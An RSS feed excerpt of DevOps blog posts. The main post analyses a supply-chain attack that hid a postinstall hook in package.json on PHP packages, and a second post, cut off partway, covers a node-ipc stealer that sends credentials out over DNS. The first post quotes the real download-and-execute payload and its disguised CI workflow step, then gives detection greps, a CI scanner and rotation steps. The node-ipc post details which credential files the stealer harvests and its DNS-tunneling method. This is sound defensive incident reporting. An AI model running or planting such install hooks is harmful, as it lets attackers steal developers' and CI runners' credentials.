<p><strong>📅 May 21, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/beyond-automation-why-manual-keyboard-testing-essential-real-accessibility"><strong>🔗 Read more</strong></a></p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[When the Malicious Hook Is in the Other Manifest: 700+ Repos, 8 Packagist Packages, One package.json Trick]]></title>
      <link>https://devops-daily.com/posts/postinstall-hidden-in-package-json-php-supply-chain-may-2026</link>
      <description><![CDATA[On May 22, 2026, Socket disclosed a Composer supply chain attack that hid an npm-style postinstall command inside package.json on PHP projects. composer.json was clean, the PHP review missed it, and 700+ GitHub repos pulled it in. Here is the exact payload, why ecosystem-boundary blindness keeps catching teams, and how to wire your CI to look at both manifests.]]></description>
      <pubDate>Sat, 23 May 2026 09:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/postinstall-hidden-in-package-json-php-supply-chain-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[Security]]></category><category><![CDATA[Packagist]]></category><category><![CDATA[npm]]></category><category><![CDATA[PHP]]></category><category><![CDATA[GitHub Actions]]></category>
      <content:encoded><![CDATA[<p>On May 22, 2026, <a href="https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos">Socket disclosed</a> a supply chain campaign that confirmed something defenders already half-knew: if your project carries two ecosystems&#39; manifests, an attacker only has to poison the one your review process ignores. The campaign hit eight Packagist (PHP / Composer) packages including the popular Laravel SaaS starter <code>devdojo/wave</code> (6,400 GitHub stars) and <code>devdojo/genesis</code> (9,100 Packagist installs). The malicious code was not in <code>composer.json</code>. It was in <code>package.json</code>. A PHP team running their normal Composer dependency review would never have seen it.</p>
<p>Within 17 hours of detection, a GitHub code search for the attacker-controlled account <code>parikhpreyash4</code> was returning hundreds of public code results across Node.js repositories. The total reach landed somewhere north of 700 GitHub repos pulling the same install hook, with a secondary spread vector hiding in <code>.github/workflows/ci.yml</code> as a step innocently named &quot;Dependency Cache Sync&quot;.</p>
<p>This post covers what the payload does, why the cross-manifest hiding trick keeps working, the one-liner that tells you whether any PHP repo you maintain is exposed, and how to make your CI look at every manifest a repo carries instead of just the one that matches the language you think it&#39;s written in.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>8 Packagist packages were compromised by adding an npm-style <code>postinstall</code> script to <code>package.json</code> (not <code>composer.json</code>). Most were development branches (<code>dev-main</code>, <code>dev-master</code>, <code>3.x-dev</code>), which is enough to hit anyone pinning to a branch instead of a tag.</li>
<li>The script downloads a Linux binary from a GitHub Releases URL, saves it as <code>/tmp/.sshd</code>, makes it executable, and runs it in the background. The binary itself was pulled from GitHub before researchers could grab a copy.</li>
<li>The attacker also injected the same command into <code>.github/workflows/ci.yml</code> of public forks as a step called &quot;Dependency Cache Sync&quot;. A merged PR can plant this; subsequent CI runs will re-infect even after the package itself is cleaned.</li>
<li>The PHP angle is the story. Cross-ecosystem manifests in a single repo are normal (any Laravel app with a Vite or Tailwind build ships both <code>composer.json</code> and <code>package.json</code>). Most security review pipelines only audit the manifest of the language they think the repo is.</li>
<li>Detection one-liner is at the bottom. Rotation order at the very bottom.</li>
</ul>
<h2 id="h2-the-exact-payload" class="group relative scroll-mt-24">
        <a href="#h2-the-exact-payload" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The exact payload
        </a>
        </h2><p>This is the literal command the attacker added to <code>package.json</code>&#39;s <code>scripts.postinstall</code> field:</p>
<pre><code class="hljs language-bash">curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2&gt;/dev/null &amp;&amp; <span class="hljs-built_in">chmod</span> +x /tmp/.sshd &amp;&amp; /tmp/.sshd &amp;
</code></pre><p>Four things to notice:</p>
<ol>
<li><code>-s</code> suppresses curl&#39;s progress meter, <code>-k</code> skips TLS certificate verification, <code>-L</code> follows redirects. The verification skip is the tell. Nothing legitimate downloads a release binary with <code>-k</code>.</li>
<li>The output path <code>/tmp/.sshd</code> is chosen to look like a system file. A casual <code>ls /tmp</code> won&#39;t see it (leading dot is hidden), and a <code>ps aux | grep ssh</code> returns a process that looks like the real OpenSSH daemon.</li>
<li><code>2&gt;/dev/null</code> discards stderr, so a failed download produces no log line.</li>
<li>The <code>&amp;</code> at the end forks the binary into the background and returns immediately. From the CI runner&#39;s perspective, <code>npm install</code> finished cleanly. The malicious binary is now running.</li>
</ol>
<p>The binary itself (<code>gvfsd-network</code>) was hosted at:</p>
<pre><code class="hljs language-text">https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network
</code></pre><p>Both the file name and the repo name are deliberate noise. <code>gvfsd-network</code> looks like a GNOME virtual filesystem helper. <code>systemd-network-helper-aa5c751f</code> looks like an internal systemd component with a commit-hash suffix. Neither is real. The attacker yanked the binary from GitHub Releases before Socket could grab a sample, so we don&#39;t know what stage 2 did, but the install pattern (background binary, hidden path, suppressed errors) is consistent with a credential stealer or a persistent C2 beacon, which is what every other Shai-Hulud and Mini-Shai-Hulud wave this month has shipped.</p>
<h2 id="h2-the-packagejson-trick" class="group relative scroll-mt-24">
        <a href="#h2-the-packagejson-trick" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The package.json trick
        </a>
        </h2><p>Composer packages are PHP. Their canonical manifest is <code>composer.json</code>. A PHP team&#39;s dependency review pipeline reads <code>composer.json</code> and <code>composer.lock</code>. They look for new dependencies, version bumps, suspicious authors, and anything weird in <code>scripts</code> (Composer has its own <code>scripts</code> system that runs PHP class methods).</p>
<p>Composer packages can also ship <code>package.json</code> for their build-time JavaScript assets. <code>devdojo/wave</code> is a Laravel starter that includes a Tailwind UI; the repo carries both manifests. When you <code>composer require devdojo/wave</code>, Composer doesn&#39;t run npm scripts. But the project&#39;s <code>package.json</code> is now sitting in your <code>vendor/devdojo/wave/</code> directory, and the moment your build pipeline does an <code>npm install</code> against it (or against your monorepo from its root, picking up nested <code>node_modules</code>), the <code>postinstall</code> hook fires.</p>
<p>That is the only ecosystem boundary the attacker had to cross. Their malicious commit looks like a normal commit to a Composer package, with a one-line addition to a file PHP devs never read.</p>
<p>This is not theoretical. Every Laravel project with a Vite or Tailwind build has the dual-manifest shape. Every npm package that ships native bindings has both <code>package.json</code> and <code>binding.gyp</code>. Every Cargo crate that vendors a Python wheel has both <code>Cargo.toml</code> and <code>pyproject.toml</code>. The defender pattern of &quot;audit the manifest of the ecosystem we think we are in&quot; is wrong every time.</p>
<h2 id="h2-the-github-actions-re-infection-vector" class="group relative scroll-mt-24">
        <a href="#h2-the-github-actions-re-infection-vector" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The GitHub Actions re-infection vector
        </a>
        </h2><p>Socket also found the same install command embedded in <code>.github/workflows/ci.yml</code> of <code>448776129/UA2F</code>, a public fork of <code>Zxilly/UA2F</code>, as a workflow step named <strong>Dependency Cache Sync</strong>.</p>
<pre><code class="hljs language-yaml"><span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Dependency</span> <span class="hljs-string">Cache</span> <span class="hljs-string">Sync</span>
  <span class="hljs-attr">run:</span> <span class="hljs-string">|
    curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2&gt;/dev/null \
      &amp;&amp; chmod +x /tmp/.sshd \
      &amp;&amp; /tmp/.sshd &amp;</span>
</code></pre><p>The step name is the disguise. &quot;Dependency Cache Sync&quot; sounds like a routine step you&#39;d skim past in a PR review. It looks like every other CI cache step you&#39;ve seen.</p>
<p>Why this matters: the GitHub Actions step survives the Packagist cleanup. Packagist removed the bad versions, but a fork that already merged the malicious workflow step keeps re-infecting its own CI runner on every push. If those runners have OIDC tokens for cloud accounts, or push permissions back to the upstream repo, that re-infection turns into a propagation loop that the original cleanup did nothing about.</p>
<p>If the original Packagist take-down felt like the end of the story when you saw the news yesterday, this is the part that isn&#39;t done.</p>
<h2 id="h2-are-you-exposed-one-liner-grep" class="group relative scroll-mt-24">
        <a href="#h2-are-you-exposed-one-liner-grep" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Are you exposed? One-liner grep
        </a>
        </h2><p>The fast check across every repo you maintain locally. From a parent directory:</p>
<pre><code class="hljs language-bash"><span class="hljs-comment"># Find any package.json scripts that download a binary from a GitHub release</span>
<span class="hljs-comment"># and write it to a hidden file in /tmp/. Catches the parikhpreyash4 campaign and any near-copies.</span>
find . -name package.json -not -path <span class="hljs-string">&#x27;*/node_modules/*&#x27;</span> -print0 \
  | xargs -0 grep -l -E <span class="hljs-string">&#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27;</span> 2&gt;/dev/null
</code></pre><p>And for already-installed Composer dependencies on a running app, check <code>vendor/</code>:</p>
<pre><code class="hljs language-bash">find vendor -name package.json -print0 \
  | xargs -0 grep -l -E <span class="hljs-string">&#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27;</span> 2&gt;/dev/null
</code></pre><p>The narrower check for the exact known IoCs:</p>
<pre><code class="hljs language-bash">grep -RE <span class="hljs-string">&#x27;parikhpreyash4|systemd-network-helper-aa5c751f|/tmp/\.sshd&#x27;</span> \
  --include=<span class="hljs-string">&#x27;package.json&#x27;</span> --include=<span class="hljs-string">&#x27;*.yml&#x27;</span> --include=<span class="hljs-string">&#x27;*.yaml&#x27;</span> \
  -l . 2&gt;/dev/null
</code></pre><p>On a running CI runner, also check for the binary itself:</p>
<pre><code class="hljs language-bash"><span class="hljs-built_in">ls</span> -la /tmp/.sshd 2&gt;/dev/null \
  &amp;&amp; ps auxf | awk <span class="hljs-string">&#x27;/[\.]sshd|sshd / {print}&#x27;</span>
</code></pre><p>A real OpenSSH daemon will be <code>/usr/sbin/sshd</code>. A process running from <code>/tmp/.sshd</code> is the malware, regardless of how it shows up in <code>ps</code>.</p>
<h2 id="h2-hardening-make-ci-look-at-every-manifest" class="group relative scroll-mt-24">
        <a href="#h2-hardening-make-ci-look-at-every-manifest" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Hardening: make CI look at every manifest
        </a>
        </h2><p>The structural fix is to scan every manifest in every repo, regardless of what language you think the repo is. A minimal GitHub Actions workflow that does the right thing:</p>
<pre><code class="hljs language-yaml"><span class="hljs-attr">name:</span> <span class="hljs-string">Cross-manifest</span> <span class="hljs-string">dependency</span> <span class="hljs-string">audit</span>
<span class="hljs-attr">on:</span>
  <span class="hljs-attr">pull_request:</span>
  <span class="hljs-attr">push:</span>
    <span class="hljs-attr">branches:</span> [<span class="hljs-string">main</span>]

<span class="hljs-attr">jobs:</span>
  <span class="hljs-attr">audit:</span>
    <span class="hljs-attr">runs-on:</span> <span class="hljs-string">ubuntu-latest</span>
    <span class="hljs-attr">steps:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">uses:</span> <span class="hljs-string">actions/checkout@v4</span>

      <span class="hljs-comment"># Run Socket&#x27;s scanner against every manifest in the repo, not just</span>
      <span class="hljs-comment"># the one matching the primary language. Socket reads composer.json,</span>
      <span class="hljs-comment"># package.json, requirements.txt, Cargo.toml, go.mod, and others —</span>
      <span class="hljs-comment"># so a Composer repo with a hidden package.json hook gets caught.</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Socket</span> <span class="hljs-string">audit</span> <span class="hljs-string">(every</span> <span class="hljs-string">manifest)</span>
        <span class="hljs-attr">uses:</span> <span class="hljs-string">SocketDev/socket-security-action@v1</span>
        <span class="hljs-attr">with:</span>
          <span class="hljs-attr">api-key:</span> <span class="hljs-string">${{</span> <span class="hljs-string">secrets.SOCKET_API_KEY</span> <span class="hljs-string">}}</span>

      <span class="hljs-comment"># A defense-in-depth grep for the install-time-script pattern. Cheap,</span>
      <span class="hljs-comment"># zero deps, catches obvious cases even on repos that don&#x27;t have a</span>
      <span class="hljs-comment"># Socket org set up.</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">Grep</span> <span class="hljs-string">for</span> <span class="hljs-string">install-time</span> <span class="hljs-string">binary</span> <span class="hljs-string">downloads</span>
        <span class="hljs-attr">run:</span> <span class="hljs-string">|
          set -euo pipefail
          MATCHES=$(grep -rE &#x27;curl.*github\.com.*releases.*-o /tmp/\.&#x27; \
            --include=&#x27;package.json&#x27; --include=&#x27;composer.json&#x27; \
            --include=&#x27;*.yml&#x27; --include=&#x27;*.yaml&#x27; \
            . || true)
          if [ -n &quot;$MATCHES&quot; ]; then
            echo &quot;::error::Install hook downloads binary to /tmp/. Refusing build.&quot;
            echo &quot;$MATCHES&quot;
            exit 1
          fi</span>
</code></pre><p>Two things to wire into your branch protection on top of that:</p>
<ul>
<li><strong>Block any PR that adds or modifies a <code>postinstall</code>, <code>preinstall</code>, or <code>install</code> script in <code>package.json</code></strong> without a CODEOWNERS review by your security team. This is policy, not tooling. Your CODEOWNERS file can target <code>package.json</code> directly.</li>
<li><strong>Pin Composer dependencies to tags, not branches.</strong> Every package in this campaign was compromised on <code>dev-main</code>, <code>dev-master</code>, or <code>3.x-dev</code>. If your <code>composer.json</code> has <code>&quot;devdojo/wave&quot;: &quot;dev-main&quot;</code>, Composer pulls whatever the branch HEAD is at install time, which is exactly what attackers want. Pin to a semver tag instead: <code>&quot;devdojo/wave&quot;: &quot;^1.4.2&quot;</code>.</li>
</ul>
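<p>Both rules, plus the CI grep, can be checked by one offline audit that parses the manifests instead of pattern-matching raw text. The Python script below is an added example, not code from Socket or from the packages named in this post; it generalizes beyond the single command shown earlier by reporting every install-time hook and every branch-tracking Composer constraint under a tree, <code>vendor/</code> included. The vendored package <code>example/starter</code>, the host <code>downloads.example.invalid</code>, the flag names and the block/review verdicts are assumptions made for the illustration.</p>

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Traits of the command shown in this post (flag names are this example's own).
TRAITS = {
    "network-fetch": re.compile(r"\b(?:curl|wget)\b"),
    "tls-verify-off": re.compile(r"\bcurl\b[^|;&]*\s-[a-zA-Z]*k|--insecure|--no-check-certificate"),
    "hidden-tmp-file": re.compile(r"/tmp/\.[\w.-]+"),
    "chmod-exec": re.compile(r"\bchmod\s+\+x\b"),
    "backgrounded": re.compile(r"(?<!&)&\s*$"),
}
# Composer constraints that follow a branch head: dev-main, 3.x-dev, ^1.0@dev.
BRANCH_PIN = re.compile(r"\bdev-\S+|\S+-dev\b|@dev\b")
# Constructed sample: same shape as the post's command, placeholder host and file name.
SAMPLE_HOOK = ("curl -skL https://downloads.example.invalid/helper -o /tmp/.helper "
               "2>/dev/null && chmod +x /tmp/.helper && /tmp/.helper &")


def load_json(path):
    """Return the manifest as a dict, or None if unreadable or not a JSON object."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None
    return data if isinstance(data, dict) else None


def scan_package_json(name, data):
    """One finding per install-time hook; 'block' if it fetches and shows another trait."""
    scripts = data.get("scripts")
    findings = []
    for hook in (INSTALL_HOOKS if isinstance(scripts, dict) else ()):
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        flags = sorted(flag for flag, rx in TRAITS.items() if rx.search(command))
        verdict = "block" if "network-fetch" in flags and len(flags) > 1 else "review"
        findings.append({"file": name, "kind": "install-hook", "hook": hook,
                         "flags": flags, "verdict": verdict, "command": command})
    return findings


def scan_composer_json(name, data):
    """Flag require / require-dev entries that track a branch instead of a tag."""
    findings = []
    for section in ("require", "require-dev"):
        deps = data.get(section)
        for package, constraint in (sorted(deps.items()) if isinstance(deps, dict) else ()):
            if isinstance(constraint, str) and BRANCH_PIN.search(constraint):
                findings.append({"file": name, "kind": "branch-pin", "package": package,
                                 "constraint": constraint, "verdict": "review"})
    return findings


def audit_tree(root):
    """Scan every package.json and composer.json below root, vendor/ included."""
    scanners = {"package.json": scan_package_json, "composer.json": scan_composer_json}
    root, findings = Path(root), []
    for path in sorted(root.rglob("*.json")):
        scanner = scanners.get(path.name)
        if scanner is None or "node_modules" in path.parts:
            continue  # node_modules is skipped, as in the post's first find command
        name, data = path.relative_to(root).as_posix(), load_json(path)
        if data is None:
            findings.append({"file": name, "kind": "unparseable", "verdict": "review"})
        else:
            findings.extend(scanner(name, data))
    return findings


def build_sample_tree(root):
    """Constructed Laravel-style layout: the app's manifests plus one vendored package."""
    files = {
        "package.json": {"scripts": {"build": "vite build", "postinstall": "husky install"}},
        "vendor/example/starter/package.json": {"scripts": {"postinstall": SAMPLE_HOOK}},
        "composer.json": {"require": {"php": "^8.2", "example/starter": "dev-main",
                                      "example/pinned": "^1.4.2", "example/legacy": "3.x-dev"}},
    }
    for rel, manifest in files.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(json.dumps(manifest), encoding="utf-8")


def run_demo():
    """Build the constructed tree in a temp directory and return the audit findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return audit_tree(tmp)


if __name__ == "__main__":
    for item in run_demo():
        print(item)
```

<p>In CI, call <code>audit_tree(".")</code> after checkout and fail the job on any <code>block</code> verdict; <code>review</code> findings are the ones to route to the CODEOWNERS reviewers.</p>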
<p>For GitHub Actions workflows, set <code>permissions: contents: read</code> at the workflow level and require explicit elevation in any step that needs <code>write</code>. A &quot;Dependency Cache Sync&quot; step that needs <code>contents: write</code> to push a binary download into <code>/tmp/</code> is suddenly very visible in a PR diff.</p>
<h2 id="h2-if-you-were-exposed-rotation-order" class="group relative scroll-mt-24">
        <a href="#h2-if-you-were-exposed-rotation-order" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          If you were exposed: rotation order
        </a>
        </h2><p>Same drill as every other supply chain compromise in May. If a runner or developer machine executed the postinstall hook, treat everything reachable from that machine as burned.</p>
<ol>
<li><strong>GitHub tokens first.</strong> <code>gh auth logout</code>, revoke every PAT at <a href="https://github.com/settings/tokens">https://github.com/settings/tokens</a>, reissue with minimum scope. Doing this first prevents the attacker from pushing a worm-propagation commit to repos you maintain.</li>
<li><strong>Cloud STS sessions.</strong> AWS: revoke active sessions for the IAM role that the runner used. GCP: <code>gcloud auth revoke --all</code>. Azure: <code>az logout &amp;&amp; az account clear</code>.</li>
<li><strong>Long-lived cloud keys.</strong> Rotate IAM access keys, GCP service account JSON keys, Azure SP credentials. Anything that was on disk in <code>~/.aws/credentials</code> or the equivalent.</li>
<li><strong>SSH keys.</strong> Reissue keypairs. Remove the compromised machine&#39;s public key from every <code>authorized_keys</code> it sat in.</li>
<li><strong>Kubeconfig.</strong> Rotate the cluster CA-signed certs for the user.</li>
<li><strong>App secrets.</strong> Anything in <code>.env</code>, anything in your secrets manager that the runner had pull access to.</li>
<li><strong>Composer auth tokens.</strong> <code>~/.composer/auth.json</code> holds Packagist credentials, private repository tokens, and GitHub OAuth for Composer. Rotate them.</li>
</ol>
<p>Then nuke <code>/tmp/.sshd</code> and any running process from it, and rebuild the runner from a known-clean image. Don&#39;t try to clean up in place. The binary was background-forked, it could have written persistence elsewhere, and you can&#39;t grep your way to confidence on a host that ran an unknown stage-2 binary.</p>
<h2 id="h2-why-this-keeps-happening" class="group relative scroll-mt-24">
        <a href="#h2-why-this-keeps-happening" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why this keeps happening
        </a>
        </h2><p>This is the fifth coordinated supply chain campaign we&#39;ve covered in the last six weeks. AntV (Shai-Hulud worm hitting <code>@antv</code> packages and <code>echarts-for-react</code>). TanStack (npm + GitHub Actions cache poisoning + dead-man&#39;s switch). node-ipc (DNS-tunneling credential exfil). The two PyPI / npm Mini-Shai-Hulud waves. Now this one.</p>
<p>The pattern is consistent: attackers are getting better at finding the seam between two systems where the defender&#39;s review process stops. TanStack exploited the seam between forked PRs and trusted CI cache. node-ipc exploited the seam between HTTPS egress controls and DNS resolution. This one exploited the seam between PHP review and JavaScript review on a repo that carries both.</p>
<p>The fix is not another tool. It&#39;s the operational discipline of looking at every manifest, every workflow, every script that runs on your build infrastructure, regardless of what language you think the project is. The teams that get hit are the ones that built their dependency-review process around one language and never thought about what happens when a Composer package ships a <code>package.json</code>.</p>
<h2 id="h2-summary" class="group relative scroll-mt-24">
        <a href="#h2-summary" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Summary
        </a>
        </h2><p>The May 22 Packagist campaign hit 8 packages and 700+ GitHub repos by hiding a <code>postinstall</code> hook in <code>package.json</code> instead of <code>composer.json</code>. PHP review pipelines missed it. The same install command shows up in <code>.github/workflows/ci.yml</code> files under the name &quot;Dependency Cache Sync&quot; as a re-infection vector that survives the package cleanup.</p>
<p>Today&#39;s actions for any team running PHP:</p>
<ul>
<li>Grep every <code>package.json</code> in <code>vendor/</code> and in your own repos for <code>curl ... /tmp/.</code>.</li>
<li>Pin Composer dependencies to tags, not branches.</li>
<li>Add CODEOWNERS protection on <code>package.json</code> install-script changes.</li>
<li>Run a cross-manifest scanner in CI so the next attacker hiding in the other ecosystem&#39;s file gets flagged before merge.</li>
</ul>
<p>Sources: <a href="https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos">Socket&#39;s original disclosure</a>, <a href="https://cybersecuritynews.com/laravel-lang-packages-compromised/">Cybersecurity News coverage of the Laravel-Lang variant</a>, and the Aikido write-up on <a href="https://www.aikido.dev/blog/supply-chain-attack-targets-laravel-lang-packages-with-credential-stealer">Laravel-Lang credential stealer</a>.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[node-ipc DNS-Tunneling Supply Chain Attack: Your Egress Firewall Probably Missed This]]></title>
      <link>https://devops-daily.com/posts/node-ipc-dns-exfil-supply-chain-may-2026</link>
      <description><![CDATA[On May 14, 2026, three malicious versions of the node-ipc npm package shipped a payload that hunts AWS, SSH, kubeconfig, and GitHub CLI credentials, then smuggles them out through DNS TXT queries. Most orgs filter HTTPS egress. Almost nobody filters DNS. Here is what the payload does and how to close the gap.]]></description>
      <pubDate>Fri, 22 May 2026 20:30:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/node-ipc-dns-exfil-supply-chain-may-2026</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[Supply Chain]]></category><category><![CDATA[Security]]></category><category><![CDATA[npm]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[CICD]]></category><category><![CDATA[DNS]]></category>
      <content:encoded><![CDATA[<p>On May 14, 2026, three new versions of <code>node-ipc</code> showed up on the npm registry within minutes of each other: <code>9.1.6</code>, <code>9.2.3</code>, and <code>12.0.1</code>. All three carried an identical 80 KB obfuscated payload injected into the package&#39;s CommonJS bundle. Inside that payload was a credential stealer that hunts more than 100 categories of sensitive files and then exfiltrates the spoils through <strong>DNS TXT queries</strong>, not HTTP.</p>
<p>That last detail is the part this post is about. Almost every supply chain post-mortem in the last twelve months ends with the same advice: pin your lockfiles, enable provenance, block outbound traffic to known-bad domains. All good advice. None of it catches an attacker who hides the stolen data inside DNS resolution traffic that your CI runners and developer laptops were going to make anyway.</p>
<p>node-ipc has roughly 822K weekly downloads and is a transitive dependency of a long list of CLI tools and frameworks. If your stack pulls it, even four levels deep, the install-time payload runs as whatever user ran <code>npm install</code>, with whatever cloud, SSH, and Kubernetes credentials that user has access to.</p>
<p>This post is the practical version: what the payload does, why DNS exfil works on most networks, the egress filtering you can ship in an afternoon, and the order to rotate if you ran any of the bad versions.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>Three malicious node-ipc versions: <code>9.1.6</code>, <code>9.2.3</code>, <code>12.0.1</code>, published 2026-05-14. Identical 80 KB payload in each.</li>
<li>Targets: AWS / GCP / Azure tokens, SSH private keys, kubeconfig, <code>.env</code> files, GitHub CLI tokens, Anthropic and OpenAI keys, Bitwarden vaults, and around 90 other credential categories.</li>
<li>Exfil: payload chunks the stolen data, encrypts it, and embeds the ciphertext in DNS TXT lookups to attacker-controlled domains. Every developer machine and CI runner can resolve DNS by default, so the traffic blends in.</li>
<li>Likely vector: maintainer account compromise on npm. The repo on GitHub was clean during the window the bad packages were live.</li>
<li>If you ran a bad version, treat every secret reachable from that machine as burned and rotate in this order: GitHub tokens, cloud STS sessions, long-lived cloud keys, SSH keys, kubeconfig, app secrets.</li>
<li>Hardening: lock CI runners and developer laptops to a small DNS allowlist (your resolver + your DoH provider), log DNS queries, and alert on TXT queries to non-allowlisted domains. None of this needs new tooling.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>Familiarity with <code>npm install</code> and lockfile semantics.</li>
<li>A network where you control the egress path for at least one set of machines (CI runners are the highest-value target).</li>
<li><code>dig</code>, <code>tcpdump</code>, or your cloud&#39;s DNS query logs to verify what the actual baseline of outbound DNS looks like.</li>
</ul>
<h2 id="h2-what-the-payload-actually-does" class="group relative scroll-mt-24">
        <a href="#h2-what-the-payload-actually-does" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What the payload actually does
        </a>
        </h2><p>When a project pulls a bad node-ipc version, the malicious CommonJS bundle runs as part of the package&#39;s normal entrypoint. Three things happen, in order.</p>
<p><strong>1. File harvest.</strong> The payload walks <code>$HOME</code>, the working directory, and a handful of well-known config paths looking for credential files. The list includes obvious targets (<code>~/.aws/credentials</code>, <code>~/.config/gcloud/application_default_credentials.json</code>, <code>~/.azure/</code>, <code>~/.ssh/id_*</code>, <code>~/.kube/config</code>) plus a long tail of the things that have leaked in previous Shai-Hulud waves (<code>~/.config/gh/hosts.yml</code>, <code>~/.npmrc</code>, <code>~/.pypirc</code>, <code>.env</code>, <code>.env.local</code>, <code>~/.config/Code/User/settings.json</code> for VS Code Anthropic keys). It also picks up Bitwarden CLI vault paths, Anthropic / OpenAI / Mistral keys from their canonical locations, and the Cursor / Continue.dev config directories.</p>
<p><strong>2. Encryption and chunking.</strong> The harvested blob is encrypted with a key derived from a hardcoded attacker public key (so only they can read it), then base32-encoded and split into chunks small enough to fit inside a DNS label. DNS labels are capped at 63 characters each and the full FQDN at 253 characters, which constrains how much you can stuff into one query. The payload uses sequence prefixes (<code>c00-</code>, <code>c01-</code>, ...) so the attacker&#39;s authoritative server can reassemble.</p>
<p><strong>3. Exfil via DNS TXT lookups.</strong> For each chunk, the payload issues a DNS TXT query for <code>&lt;chunk&gt;.&lt;sequence&gt;.&lt;victim-id&gt;.&lt;attacker-domain&gt;</code>. The OS resolver dutifully forwards the query upstream. Eventually it hits the attacker&#39;s authoritative name server, which logs the query, returns a junk TXT answer, and now has another piece of your <code>~/.aws/credentials</code>.</p>
<p>The clever bit is the resolver hop. The payload itself never opens a socket to the attacker. The OS resolver does, on its behalf, to whatever DNS forwarder you have configured. If your CI runner can resolve <code>npmjs.com</code> to install packages in the first place, it can also resolve <code>&lt;stolen-credentials&gt;.&lt;attacker-domain&gt;</code> without anything looking obviously wrong.</p>
<h2 id="h2-why-most-egress-controls-miss-this" class="group relative scroll-mt-24">
        <a href="#h2-why-most-egress-controls-miss-this" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Why most egress controls miss this
        </a>
        </h2><p>Pretty much every &quot;secure your CI&quot; post you have read goes something like: lock down outbound HTTPS to a small allowlist of registries (<code>registry.npmjs.org</code>, your container registry, GitHub) and block everything else. That is a real control. Most network egress filtering at this layer is implemented via an HTTP CONNECT proxy, an AWS Network Firewall rule, or a Cilium L7 policy.</p>
<p>DNS sits underneath all of that. Before any HTTPS connection happens, the runner asks the OS resolver for an A or AAAA record. The OS resolver forwards to whatever was set in <code>/etc/resolv.conf</code>, usually a cloud-provided resolver (AWS at <code>169.254.169.253</code> from within a VPC, or Google at <code>169.254.169.254</code> for GCE). The resolver chases the query out to authoritative servers on the public internet. By the time the runner&#39;s HTTP-egress firewall sees the connection, the DNS query has already happened, and any TXT lookups the payload made along the way are already logged on the attacker&#39;s name server.</p>
<p>So:</p>
<ul>
<li>An L7 HTTPS allowlist does not block this. The exfil never makes an HTTPS connection.</li>
<li>A blanket &quot;block all outbound except 443 to allowlisted domains&quot; rule does not block this. UDP/53 (or TCP/53) to the cloud-provided resolver is needed for <em>any</em> DNS to work, including the legitimate <code>registry.npmjs.org</code> resolution that your build needs.</li>
<li>Even DoH or DoT to your own resolver does not block this if the resolver itself is happy to forward arbitrary public queries.</li>
</ul>
<p>The control you actually need is at the <strong>resolver</strong> layer: an allowlist of domains the resolver is willing to answer for, with everything else returning NXDOMAIN. Or, less drastically, query logging plus an alert on patterns that look like exfil.</p>
<h2 id="h2-detection-spotting-exfil-in-your-dns-logs" class="group relative scroll-mt-24">
        <a href="#h2-detection-spotting-exfil-in-your-dns-logs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
